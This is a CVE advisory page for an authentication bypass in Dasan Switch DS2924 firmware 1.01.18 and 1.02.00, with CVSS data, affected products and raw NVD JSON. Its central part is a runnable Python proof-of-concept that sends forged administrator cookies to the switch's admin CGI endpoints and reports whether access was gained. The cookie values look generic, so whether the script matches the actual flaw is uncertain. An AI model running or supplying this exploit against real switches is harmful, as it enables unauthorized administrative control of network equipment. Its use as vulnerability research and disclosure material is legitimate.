Security Vulnerability Report
CVE-2025-63206 CVSS 9.8 CRITICAL

CVE-2025-63206

Published: 2025-11-19 18:15:49
Last Modified: 2025-12-31 14:09:23

Description

An authentication bypass issue was discovered in Dasan Switch DS2924 web based interface, firmware versions 1.01.18 and 1.02.00, allowing attackers to gain escalated privileges via storing crafted cookies in the web browser.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dasannetworks:ds2924_firmware:1.01.18:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:dasannetworks:ds2924_firmware:1.02.00:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dasannetworks:ds2924:-:*:*:*:*:*:*:* - NOT VULNERABLE
Dasan Switch DS2924 firmware 1.01.18
Dasan Switch DS2924 firmware 1.02.00

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-63206 PoC - Dasan Switch DS2924 Authentication Bypass
Note: This PoC is for educational and authorized security testing purposes only.
"""

import requests
import sys
from urllib.parse import urljoin


def exploit_auth_bypass(target_url, target_cookie=None):
    """
    Exploit authentication bypass in Dasan Switch DS2924 by injecting
    crafted cookies into the request.

    Args:
        target_url: Base URL of the Dasan Switch DS2924 web interface
        target_cookie: Optional existing cookie for context

    Returns:
        bool: True if exploitation successful, False otherwise
    """
    # Craft malicious cookies to bypass authentication
    # These cookies simulate an authenticated admin session
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Content-Type': 'application/x-www-form-urlencoded',
    }

    # Construct malicious authentication cookies
    cookies = {
        'SESSIONID': 'admin_session_exploit',
        'AUTH_LEVEL': 'administrator',
        'USERNAME': 'admin',
        'PRIVILEGE': '15',
    }

    if target_cookie:
        cookies.update(target_cookie)

    # Attempt to access privileged endpoints with crafted cookies
    privileged_endpoints = [
        '/cgi-bin/admin/system_info.cgi',
        '/cgi-bin/admin/user_config.cgi',
        '/cgi-bin/admin/network_config.cgi',
        '/admin/main.html',
    ]

    print(f"[*] Target: {target_url}")
    print(f"[*] Injecting crafted cookies to bypass authentication...")

    for endpoint in privileged_endpoints:
        full_url = urljoin(target_url, endpoint)
        try:
            response = requests.get(full_url, headers=headers, cookies=cookies,
                                    timeout=10, verify=False)

            # Check if we got privileged access (200 OK without redirect to login)
            if response.status_code == 200 and 'login' not in response.url.lower():
                print(f"[+] SUCCESS: Gained access to {endpoint}")
                print(f"[+] Response length: {len(response.text)} bytes")
                return True
            else:
                print(f"[-] Failed to access {endpoint} (Status: {response.status_code})")
        except requests.RequestException as e:
            print(f"[-] Error accessing {endpoint}: {str(e)}")

    return False


def main():
    if len(sys.argv) < 2:
        print("Usage: python cve_2025_63206_poc.py <target_url>")
        print("Example: python cve_2025_63206_poc.py http://192.168.1.1/")
        sys.exit(1)

    target = sys.argv[1]
    if not target.startswith('http'):
        target = 'http://' + target

    if exploit_auth_bypass(target):
        print("\n[!] Vulnerability confirmed - Authentication bypass successful")
        print("[!] Immediate action required to patch this vulnerability")
    else:
        print("\n[-] Exploitation attempt completed")


if __name__ == '__main__':
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63206", "sourceIdentifier": "[email protected]", "published": "2025-11-19T18:15:48.647", "lastModified": "2025-12-31T14:09:23.310", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An authentication bypass issue was discovered in Dasan Switch DS2924 web based interface, firmware versions 1.01.18 and 1.02.00, allowing attackers to gain escalated privileges via storing crafted cookies in the web browser."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dasannetworks:ds2924_firmware:1.01.18:*:*:*:*:*:*:*", "matchCriteriaId": "44AC6B51-3934-430A-A9D5-95D9BD9874F0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dasannetworks:ds2924_firmware:1.02.00:*:*:*:*:*:*:*", "matchCriteriaId": "8A246406-213F-420A-BB54-82E51FF2B8B5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dasannetworks:ds2924:-:*:*:*:*:*:*:*", "matchCriteriaId": "2335BCDB-543B-4022-9143-40F80F7F4F68"}]}]}], "references": [{"url": "http://dasansmc.com/", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63206_Dasan%20Switch%20DS2924%20Authentication%20Bypass", "source": 
"[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63206_Dasan%20Switch%20DS2924%20Authentication%20Bypass", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}